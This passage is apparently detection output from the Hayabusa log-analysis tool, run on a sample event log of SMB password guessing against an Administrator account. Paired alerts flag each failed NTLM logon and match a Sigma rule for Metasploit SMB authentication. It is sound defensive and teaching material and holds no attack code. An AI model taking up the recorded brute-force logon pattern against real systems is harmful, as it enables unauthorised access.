SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y9GfR4XdixrNJHny : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.195 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 27JWPfEV4DgS1tNv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yNeJnXg1pyedSpqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.280 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.324 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: WWihv14n9IAQXw2X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.324 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gy19bFWzQFaQZRBa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.412 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N28Ec4jkXkSNvsQ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.412 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.447 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sD9qQWJbeukyPQbc : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.447 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uoRSHXvwMeKg8cyQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.487 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bPEOhloL7vo1fTFQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: glbLglffka5JqQCN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.564 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7MTbgvYN6PIaKxeK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.612 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tAjWfgmGrm3o2mAx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.652 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.683 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9EZYPG6uQtsez1UI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.683 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: PRcnsdLAKd7enemG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.759 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OUZEQaUavv7fWk4w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.759 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JKth56VEMqMCgwG9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.834 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TCGlvOFFkVpSHSoM : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.834 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jmLxSIastsvqdJC8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.895 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IPyvUDHHWzbhyvZE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.895 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S7dF4fIlAvIBYiw0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.935 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bPDPtH2m9TgW8Khg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AChGHCNom0ds5ujV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8sLQI4KGgQRq2Sy9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: dqeLFLRT5EXiCBUC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dx3tco9up7XnOa7h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.124 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.159 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZdNX4ubtpQaV9EeF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.159 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.189 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S05I0ZlGKGazkVkL : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.189 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pzbfrYSYhxH6WcCt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZGTvXs8Mlc0Fi7iT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.304 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.345 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C1LjtTFjPfPlBqAi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.345 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1lhJW3iO1xGGTMhp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.389 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.427 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IMz7WmlBTgadVgN8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.427 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OB02epCA5pc5oBeJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.468 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.503 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: KAFgReUMtu9VerRl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.503 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ByeL26yQfohpQT3z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.543 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 527r3nh9ocmItXfL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.597 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HNeC1BBFVXv839Ys : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: juXXpQcoPfJLMQ3L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.673 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: njNdv4lGnsUpooCP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.708 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j6VchLhWJT7cCWVR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.748 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r3xxnFpbd8zkFm0h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.788 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jtf156NEpOebQHGC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.824 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 17O1jfGX6KQMPgnD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.868 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 3NaqTqrCiPPfNxZF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.905 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Az7cwIWXUGVIMTv5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.950 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Djaxf99PVs2VkMy6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.004 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rbTSoTdaQ0Y4c9Gw : IP Address: 192.168.198.149 : AuthPackage: 
